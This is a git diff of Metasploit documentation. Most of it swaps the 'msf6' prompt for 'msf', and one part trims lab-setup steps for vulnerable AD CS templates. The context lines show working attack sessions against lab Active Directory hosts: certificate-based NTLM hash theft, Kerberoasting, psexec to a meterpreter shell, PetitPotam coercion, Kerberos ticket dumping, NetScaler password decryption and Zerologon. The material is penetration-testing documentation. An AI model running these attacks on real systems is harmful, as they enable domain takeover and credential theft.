+[*] 172.16.199.200:445 -   * 1.3.6.1.4.1.311.10.3.4 (Encrypting File System)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator@kerberos.issue
+[*] 172.16.199.200:445 - Certificate URI: tag:microsoft.com,2022-09-14:sid:S-1-5-21-2324486357-3075865580-3606784161-500, S-1-5-21-2324486357-3075865580-3606784161-500
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250711145606_default_172.16.199.200_windows.ad.cs_597422.pfx
+[*] Auxiliary module execution completed
+
+
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > use admin/kerberos/get_ticket
+[*] Using action GET_TGT - view all 3 actions with the show actions command
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhost=172.16.199.200 cert_file=/Users/jheysel/.msf4/loot/20250711145606_default_172.16.199.200_windows.ad.cs_597422.pfx
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250711145619_default_172.16.199.200_mit.kerberos.cca_635830.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Administrator@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250711145619_default_172.16.199.200_mit.kerberos.cca_787259.bin
+[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[*] Auxiliary module execution completed
+```
+
 # Authenticating With A Certificate
 Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
 further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
@@ -1100,7 +1658,7 @@ Certificates can be used to obtain the NTLM hash of an account with the PKINIT e
 action to `GET_HASH`.

 ```msf
-msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+msf auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
 [*] Running module against 172.30.239.85

 [+] 172.30.239.85:88 - Received a valid TGT-Response
@@ -1110,7 +1668,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.30.239.85 cert_f
 [*] 172.30.239.85:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_031414.bin
 [+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/kerberos/get_ticket) >
+msf auxiliary(admin/kerberos/get_ticket) >
 ```

 ### Getting A Kerberos Ticket
@@ -1118,21 +1676,21 @@ Certificates can be used to issue a Kerberos ticket granting ticket (TGT) which
 services such as HTTP, LDAP and SMB. Ticket granting tickets can be requested using the `GET_TGT` action.

 ```msf
-msf6 auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_172.30.239.85_windows.ad.cs_287833.pfx
+msf auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_172.30.239.85_windows.ad.cs_287833.pfx
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:88 - Getting TGT for Administrator@daforest.com
 [+] 172.30.239.85:88 - Received a valid TGT-Response
 [*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/kerberos/get_ticket) > klist
+msf auxiliary(admin/kerberos/get_ticket) > klist
 Kerberos Cache
 ==============
 host           principal                   sname                             issued                     status  path
 ----           ---------                   -----                             ------                     ------  ----
 172.30.239.85  Administrator@daforest.com  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-01-24 20:23:54 -0500  valid   /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin

-msf6 auxiliary(admin/kerberos/get_ticket) >
+msf auxiliary(admin/kerberos/get_ticket) >
 ```

 Once the TGT has been issued, it can be seen in the output of the `klist` command. With the TGT saved, it will
@@ -1148,16 +1706,16 @@ use schannel authentication a few options must be set.
 * `SSL` -- must be set to `true` (`schannel` authentication is only compatible with TLS connections)

 ```msf
-msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.30.239.85
+msf auxiliary(gather/ldap_query) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(gather/ldap_query) > set LDAP::Auth schannel
+msf auxiliary(gather/ldap_query) > set LDAP::Auth schannel
 LDAP::Auth => schannel
-msf6 auxiliary(gather/ldap_query) > set LDAP::CertFile /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+msf auxiliary(gather/ldap_query) > set LDAP::CertFile /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
 LDAP::CertFile => /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
-msf6 auxiliary(gather/ldap_query) > set SSL true
+msf auxiliary(gather/ldap_query) > set SSL true
 [!] Changing the SSL option's value may require changing RPORT!
 SSL => true
-msf6 auxiliary(gather/ldap_query) > enum_domain
+msf auxiliary(gather/ldap_query) > enum_domain
 [*] Running module against 172.30.239.85

 [*] Discovering base DN automatically
@@ -1178,5 +1736,5 @@ DC=msflab DC=local
 objectsid                  S-1-5-21-3402587289-1488798532-3618296993

 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_query) >
+msf auxiliary(gather/ldap_query) >
 ```
@@ -52,79 +52,4 @@ Microsoft provides a very useful [training module](https://learn.microsoft.com/e
 that covers the fundamentals of AD CS and as well as examples which cover the management of certificate enrollment, certificate revocation and certificate trusts.

 ## Setting up A Vulnerable AD CS Server
-The following steps assume that you have installed an AD CS on either a new or existing domain controller.
-### Installing AD CS
-1. Open the Server Manager
-2. Select Add roles and features
-3. Select "Active Directory Certificate Services" under the "Server Roles" section
-4. When prompted add all of the features and management tools
-5. On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
-6. Completion the installation and reboot the server
-7. Reopen the Server Manager
-8. Go to the AD CS tab and where it says "Configuration Required", hit "More" then "Configure Active Directory Certificate..."
-9. Select "Certificate Authority" in the Role Services tab
-10. Select "Enterprise CA" in the "Setup Type" tab (the user must be a Domain Administrator for this option to be available)
-11. Keep all of the default settings, noting the value of the "Common name for this CA" on the "CA Name" tab (this value corresponds to the `CA` datastore option)
-12. Accept the rest of the default settings and complete the configuration
-
-### Setting up a ESC1 Vulnerable Certificate Template
-1. Open up the run prompt and type in `certsrv`.
-2. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`. Right click on the folder in the drop down marked `Certificate Templates` and then click `Manage`.
-3. Scroll down to the `User` certificate. Right click on it and select `Duplicate Template`.
-4. From here you can refer to the following [Active-Directory-Certificate-Services-abuse](https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md) documentation for screenshots.
-5. Select the `General` tab and rename this to something meaningful like `ESC1-Template`, then click the `Apply` button.
-6. In the `Subject Name` tab, select `Supply in the request` and click `Ok` on the security warning that appears. Then click the `Apply` button.
-7. Scroll to the `Extensions` tab and under `Application Policies` ensure that `Client Authentication`, `Server Authentication`, `KDC Authentication`, or `Smart Card Logon`  is listed. Then click the `Apply` button.
-8. Under the `Security` tab make sure that `Domain Users` group listed and the `Enroll` permissions is marked as allowed for this group.
-9. Under `Issuance Requirements` tab, ensure that under `Require the following for enrollment` that the `CA certificate manager approval` box is unticked, as is the `This number of authorized signatures` box.
-10. Click `Apply` and then `Ok`
-11. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-12. Scroll down and select the `ESC1-Template` certificate, or whatever you named the ESC1 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC2 Vulnerable Certificate Template
-1. Open up `certsrv`
-2. Scroll down to `Certificate Templates` folder, right click on it and select `Manage`.
-3. Find the `ESC1` certificate template you created earlier and right click on that, then select `Duplicate Template`.
-4. Select the `General` tab, and then name the template `ESC2-Template`. Then click `Apply`.
-5. Go to the `Subject Name` tab and select `Build from this Active Directory Information` and select `Fully distinguished name` under the `Subject Name Format`. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don't think will matter so much so long as the `Supply in the request` option isn't ticked. Then click `Apply`.
-6. Go the to `Extensions` tab and click on `Application Policies`. Then click on `Edit`.
-7. Delete all the existing application policies by clicking on them one by one and clicking the `Remove` button.
-8. Click the `Add` button and select `Any Purpose` from the list that appears. Then click the `OK` button.
-9. Click the `Apply` button, and then `OK`. The certificate should now be created.
-10. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-11. Scroll down and select the `ESC2-Template` certificate, or whatever you named the ESC2 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC3 Template 1 Vulnerable Certificate Template
-1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template1`, then click `Apply`.
-2. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Certificate Request Agent`, then click `OK`.
-3. Click `Apply`.
-4. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` and `This number of authorized signatures` are unchecked.
-5. Click `Apply` if any changes were made or the button is not grey'd out, then click `OK` to create the certificate.
-6. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-7. Scroll down and select the `ESC3-Template1` certificate, or whatever you named the ESC3 template number 1 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC3 Template 2 Vulnerable Certificate Template
-1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template2`, then click `Apply`.
-2. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Client Authentication`, then click `OK`.
-3. Click `Apply`.
-4. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` is unchecked.
-5. Check the `This number of authorized signatures` checkbox and ensure the value specified is 1, and that the `Policy type required in signature` is set to `Application Policy`, and that the `Application policy` value is `Certificate Request Agent`.
-6. Click `Apply` and then click `OK` to issue the certificate.
-7. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-8. Scroll down and select the `ESC3-Template2` certificate, or whatever you named the ESC3 template number 2 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC8 Vulnerable Host
-1. Follow instructions for creating an AD CS enabled server
-2. Select Add Roles and Features
-3. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
-4. For each selection, accept the default for any pop-up.
-5. Accept the default features and install.
-6. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
-7. Under Credentials, accept the default
-8. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
-9. In CA for CES, accept the defaults
-10. In Authentication Types, accept the default integrated authentication
-11. In Service account for CES, select `Use built-in application pool identity`
-12. Accept default integrated authentication for CEP
-13. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
-14. Accept the remaining defaults.
+The steps for setting up a vulnerable AD CS server are covered in the [[Installing AD CS|./ldap_esc_vulnerable_cert_finder.md]] section.
@@ -51,7 +51,7 @@ run rhost=192.168.123.13 user=<username> pass=<password> domain=<domain>
 If you followed the lab setup setup above, this should output the following result:

 ```msf
-msf6 auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local
+msf auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local

 [*] Running for 192.168.123.13...
 [+] ServicePrincipalName                    Name                MemberOf  PasswordLastSet             LastLogon  Delegation
@@ -109,16 +109,16 @@ First an SPN needs to be found. This can be done in a number of ways - including
 very own `auxiliary/gather/ldap_query` module:

 ```msf
-msf6 > use auxiliary/gather/ldap_query
-msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
+msf > use auxiliary/gather/ldap_query
+msf auxiliary(gather/ldap_query) > set RHOSTS 172.16.199.235
 RHOSTS => 172.16.199.235
-msf6 auxiliary(gather/ldap_query) > set BIND_DN DARWIN_CLAY
+msf auxiliary(gather/ldap_query) > set BIND_DN DARWIN_CLAY
 BIND_DN => DARWIN_CLAY
-msf6 auxiliary(gather/ldap_query) > set BIND_PW N0tpassword!
+msf auxiliary(gather/ldap_query) > set BIND_PW N0tpassword!
 BIND_PW => N0tpassword!
-msf6 auxiliary(gather/ldap_query) > set action ENUM_USER_SPNS_KERBEROAST
+msf auxiliary(gather/ldap_query) > set action ENUM_USER_SPNS_KERBEROAST
 action => ENUM_USER_SPNS_KERBEROAST
-msf6 auxiliary(gather/ldap_query) > run
+msf auxiliary(gather/ldap_query) > run
 [*] Running module against 172.16.199.235

 [+] Successfully bound to the LDAP server!
@@ -18,8 +18,8 @@ Metasploit currently offers Kerberos authentication for the following services -
 Open a WinRM session:

 ```msf
-msf6 > use auxiliary/scanner/winrm/winrm_login
-msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local
+msf > use auxiliary/scanner/winrm/winrm_login
+msf auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

 [+] 192.168.123.13:88 - Received a valid TGT-Response
 [*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
@@ -31,7 +31,7 @@ msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Ad
 [*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
+msf auxiliary(scanner/winrm/winrm_login) > sessions -i -1
 [*] Starting interaction with 1...

 Microsoft Windows [Version 10.0.14393]
@@ -43,8 +43,8 @@ C:\Users\Administrator>
 Query LDAP for accounts:

 ```msf
-msf6 > use auxiliary/gather/ldap_query
-msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
+msf > use auxiliary/gather/ldap_query
+msf auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13

 [+] 192.168.123.13:88 - Received a valid TGT-Response
@@ -79,8 +79,8 @@ CN=Administrator CN=Users DC=adf3 DC=local
 Running psexec against a host:

 ```msf
-msf6 > use exploit/windows/smb/psexec
-msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
+msf > use exploit/windows/smb/psexec
+msf exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

 [*] Started reverse TCP handler on 192.168.123.1:4444
 [*] 192.168.123.13:445 - Connecting to the server...
@@ -102,8 +102,8 @@ meterpreter >
 Connect to a Microsoft SQL Server instance and run a query:

 ```msf
-msf6 > use auxiliary/admin/mssql/mssql_sql
-msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
+msf > use auxiliary/admin/mssql/mssql_sql
+msf auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
 [*] Running module against 192.168.123.13

@@ -142,7 +142,7 @@ Optional options:
    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
    * `write-only` -- New tickets are requested and they are stored for reuse.
    * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
-* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`

 ## Ticket management

@@ -150,7 +150,7 @@ When a write-enabled `KrbCacheMode` is used, tickets that are issued to Metasplo
 command can be used to view tickets. It is a top level command and can be run even if a module is in use.

 ```msf
-msf6 > klist
+msf > klist
 Kerberos Cache
 ==============
 host            principal               sname                              issued                     status       path
@@ -167,7 +167,7 @@ host            principal               sname                              issue
 More detailed information can be displayed by using the verbose (`-v` / `--verbose`) option.

 ```msf
-msf6 > klist -v
+msf > klist -v
 Kerberos Cache
 ==============
 Cache[0]:
@@ -236,7 +236,7 @@ CCACHE files can be viewed with the `loot --type mit.kerberos.ccache` command (t
 specified type).

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > loot --type mit.kerberos.ccache
+msf auxiliary(admin/dcerpc/icpr_cert) > loot --type mit.kerberos.ccache

 Loot
 ====
@@ -46,18 +46,18 @@ and should be ignored as targets.

 Use the `ENUM_UNCONSTRAINED_DELEGATION` action to enumerate targets:
 ```
-msf6 > use auxiliary/gather/ldap_query
-msf6 auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10
+msf > use auxiliary/gather/ldap_query
+msf auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(gather/ldap_query) > set DOMAIN msflab.local
+msf auxiliary(gather/ldap_query) > set DOMAIN msflab.local
 DOMAIN => msflab.local
-msf6 auxiliary(gather/ldap_query) > set USERNAME aliddle
+msf auxiliary(gather/ldap_query) > set USERNAME aliddle
 USERNAME => aliddle
-msf6 auxiliary(gather/ldap_query) > set PASSWORD Password1!
+msf auxiliary(gather/ldap_query) > set PASSWORD Password1!
 PASSWORD => Password1!
-msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION 
+msf auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION 
 ACTION => ENUM_UNCONSTRAINED_DELEGATION
-msf6 auxiliary(gather/ldap_query) > run
+msf auxiliary(gather/ldap_query) > run
 [*] Running module against 192.168.159.10

 [*] Discovering base DN automatically
@@ -83,16 +83,16 @@ CN=DC OU=Domain Controllers DC=msflab DC=local
 samaccountname  DC$

 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_query) > 
+msf auxiliary(gather/ldap_query) > 
 ```

 This results in two potential targets, WS01 and DC. Next, use the `ENUM_DOMAIN_CONTROLLERS` action to identify the
 domain controllers to remove from the list of potential targets.

 ```
-msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS 
+msf auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS 
 ACTION => ENUM_DOMAIN_CONTROLLERS
-msf6 auxiliary(gather/ldap_query) > run
+msf auxiliary(gather/ldap_query) > run
 [*] Running module against 192.168.159.10

 [*] Discovering base DN automatically
@@ -110,7 +110,7 @@ CN=DC OU=Domain Controllers DC=msflab DC=local
 operatingsystemversion  10.0 (17763)

 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_query) >
+msf auxiliary(gather/ldap_query) >
 ```

 This shows that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target.
@@ -124,21 +124,21 @@ remaining options including `RHOSTS` to the domain controller, and `SMBUser` / `
 compromised domain account.

 ```
-msf6 > use auxiliary/scanner/dcerpc/petitpotam 
-msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local
+msf > use auxiliary/scanner/dcerpc/petitpotam 
+msf auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local
 LISTENER => ws01.msflab.local
-msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle
+msf auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle
 SMBUser => aliddle
-msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1!
+msf auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10
+msf auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(scanner/dcerpc/petitpotam) > run
+msf auxiliary(scanner/dcerpc/petitpotam) > run

 [+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
 [*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf6 auxiliary(scanner/dcerpc/petitpotam) >
+msf auxiliary(scanner/dcerpc/petitpotam) >
 ```

 If the module does not indicate that the attack was successful, another tool like
@@ -150,12 +150,12 @@ from the compromised host. If the attack was successful there should be at least
 computer account.

 ```
-msf6 > use post/windows/manage/kerberos_tickets 
-msf6 post(windows/manage/kerberos_tickets) > set SESSION -1
+msf > use post/windows/manage/kerberos_tickets 
+msf post(windows/manage/kerberos_tickets) > set SESSION -1
 SESSION => -1
-msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
+msf post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
 SERVICE => krbtgt/*
-msf6 post(windows/manage/kerberos_tickets) > run
+msf post(windows/manage/kerberos_tickets) > run

 [*] LSA Handle: 0x000001efe1c415a0
 [*] LogonSession LUID: 0x00004bc1d 
@@ -208,7 +208,7 @@ In this case, a TGT for the `MSFLAB\DC$` account was obtained through the logon
 ticket was stored to disk in a ccache file. The ticket can also be seen in the output of `klist`.

 ```
-msf6 post(windows/manage/kerberos_tickets) > klist
+msf post(windows/manage/kerberos_tickets) > klist
 Kerberos Cache
 ==============
 id   host            principal               sname                             issued                     status  path
@@ -216,7 +216,7 @@ id   host            principal               sname                             i
 411  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 09:32:46 -0400  active  /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin
 407  192.168.159.10  WS01$@MSFLAB.LOCAL      krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 15:14:46 -0400  active  /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin

-msf6 post(windows/manage/kerberos_tickets) > 
+msf post(windows/manage/kerberos_tickets) > 
 ```

 ### Using The Ticket
@@ -81,12 +81,12 @@ Examples

 Starting a module as a job:

-    msf5 exploit(multi/handler) > run -j
+    msf exploit(multi/handler) > run -j
    [*] Exploit running as background job 1.

 A verbose listing of all the jobs:

-    msf5 exploit(multi/handler) > jobs -v
+    msf exploit(multi/handler) > jobs -v
    
    Jobs
    ====
@@ -97,16 +97,16 @@ A verbose listing of all the jobs:

 Set some jobs to be started on `msfconsole` start:

-    msf5 exploit(multi/handler) > jobs -p 1-2
+    msf exploit(multi/handler) > jobs -p 1-2
    Added persistence to job 1.
    Added persistence to job 2.

 Getting information about a specific job:

-    msf5 exploit(multi/handler) > jobs -i 1
+    msf exploit(multi/handler) > jobs -i 1
    
    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
-    msf5 exploit(multi/handler) > jobs -i 1 -v
+    msf exploit(multi/handler) > jobs -i 1 -v
    
    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
    
@@ -30,8 +30,8 @@ Examples

 Run the heartbleed module every 10 seconds against a server for an hour:

-    msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
-    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
+    msf > use auxiliary/scanner/ssl/openssl_heartbleed
+    msf auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
    # Set other options...
-    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10
+    msf auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10

@@ -107,10 +107,10 @@ fragments currently defined on the appliance as well as the current `ns.conf` fi

 Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:
 ```
-msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
+msf > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
 ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump

 [*] Config line:
 add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
@@ -141,20 +141,20 @@ add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -disp
 [+] User: wiz@cesium137.io
 [+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
 ```

 Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:

 ```
-msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
+msf > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
 ns_conf => /tmp/ns.conf
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
 ns_kek_f1 => /tmp/F1.key
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
 ns_kek_f2 => /tmp/F2.key
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump

 [*] Building NetScaler KEK from key fragments ...
 [+] NS KEK F1
@@ -208,5 +208,5 @@ add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c599
 [+] User: ldap
 [+] Pass: Gr33n3gg$
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+msf auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
 ```
@@ -52,12 +52,12 @@ This value is only used when running the module with the `RESTORE` action.
 First, exploit the vulnerability to remove the machine account password by replacing it with an empty string.

 ```
-msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.159.53 
+msf > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.159.53 
 RHOSTS => 192.168.159.53
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME WIN-GD5KVDKUNIP
+msf auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME WIN-GD5KVDKUNIP
 NBNAME => WIN-GD5KVDKUNIP
-msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 
